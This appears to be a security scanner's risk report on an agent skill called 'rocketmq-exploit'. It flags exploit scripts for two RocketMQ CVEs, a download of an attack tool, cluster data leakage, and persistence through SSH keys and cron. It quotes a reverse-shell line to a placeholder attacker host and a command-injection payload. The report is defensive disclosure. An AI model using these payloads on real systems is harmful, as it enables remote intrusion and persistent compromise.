The Agent Skills Directory

[REMOTE_CODE_EXECUTION]: The skill provides ready-to-use Python exploit scripts for CVE-2023-33246 (Broker Command Injection) and CVE-2023-37582 (NameServer Arbitrary File Write). These scripts are designed to execute arbitrary code on remote targets.
Evidence: references/cve-2023-33246-broker-rce.md and references/cve-2023-37582-namesrv-write.md contain full exploit implementations.
[COMMAND_EXECUTION]: The skill contains specific payloads for executing bash commands on targets, including techniques to bypass restrictions and execute reverse shells.
Evidence: Payloads like rocketmqHome=-c $@|sh . echo <COMMAND>; and crontab entries for reverse shells (bash -i >& /dev/tcp/ATTACKER/PORT 0>&1) are documented.
[EXTERNAL_DOWNLOADS]: Instructions are provided to download and execute an external Java exploit tool (rocketmq-attack-1.1-SNAPSHOT.jar) from a third-party GitHub repository not associated with a trusted vendor.
Evidence: references/detection-and-tools.md references https://github.com/vulhub/rocketmq-attack/releases.
[DATA_EXFILTRATION]: Includes tools and methodology to leak sensitive cluster information from RocketMQ Dashboard and Broker instances without authentication.
Evidence: check_dashboard function in references/detection-and-tools.md specifically targets /cluster/list.query for information disclosure.
[PERSISTENCE]: The skill provides detailed methods for achieving persistence on a compromised system by writing SSH authorized keys or creating malicious cron jobs.
Evidence: Explicit examples for writing to /root/.ssh/authorized_keys and /var/spool/cron/root are provided in the usage sections.
[MALICIOUS_DETECTION]: Automated AV scanners confirmed that references/cve-2023-33246-broker-rce.md contains a Trojan (Python:Agent-RX [Trj]), and YARA scans detected reverse shell patterns in multiple files.

rocketmq-exploit